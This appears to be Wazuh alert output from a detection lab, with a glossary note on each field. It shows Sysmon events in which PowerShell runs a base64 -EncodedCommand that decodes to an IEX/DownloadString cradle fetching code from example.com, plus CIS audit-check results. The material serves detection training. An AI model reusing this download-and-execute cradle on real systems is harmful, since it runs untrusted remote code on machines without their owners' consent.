rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534345.1765722 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26159 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit events generated by the management of task scheduler jobs or COM+ objects. For scheduler jobs, the following are audited: - Job created. - Job deleted. - Job enabled. - Job disabled. - Job updated. For COM+ objects, the following are audited: - Catalog object added. - Catalog object updated. - Catalog object deleted. The recommended state for this setting is: Success and Failure. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The unexpected creation of scheduled tasks and COM+ objects could potentially be an indication of malicious activity. Since these types of actions are generally low volume, it may be useful to capture them in the audit logs for use during an investigation. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Other Object Access Events Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Other Object Access Events"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable Outcome of the check: passed, failed, or not applicable (here the check could not complete, see the reason field). Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Other Object Access Events"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 82 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534346.1769247 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:03.9444278Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285082 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:02.373
ProcessGuid: {94294ddc-bd86-680a-940b-000000000e00}
ProcessId: 5364
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd82-680a-910b-000000000e00}
ParentProcessId: 13540
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:02.373 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd86-680a-940b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5364 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd82-680a-910b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 86 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534346.1777314 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:04.3702749Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285088 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:04.338
ProcessGuid: {94294ddc-bd86-680a-940b-000000000e00}
ProcessId: 5364
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4t3svkop.qwu.ps1
CreationUtcTime: 2025-04-24 22:39:04.338
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:04.338 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd86-680a-940b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5364 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4t3svkop.qwu.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:04.338 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 83 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534350.1780079 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:08.2011382Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285123 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:06.839
ProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00}
ProcessId: 1816
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd86-680a-940b-000000000e00}
ParentProcessId: 5364
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:06.839 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd8a-680a-970b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1816 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd86-680a-940b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5364 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 87 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534350.1788142 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:08.4452638Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285124 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:08.409
ProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00}
ProcessId: 1816
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_jawvpd1b.ilj.ps1
CreationUtcTime: 2025-04-24 22:39:08.409
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:08.409 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd8a-680a-970b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1816 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jawvpd1b.ilj.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:08.409 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 84 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
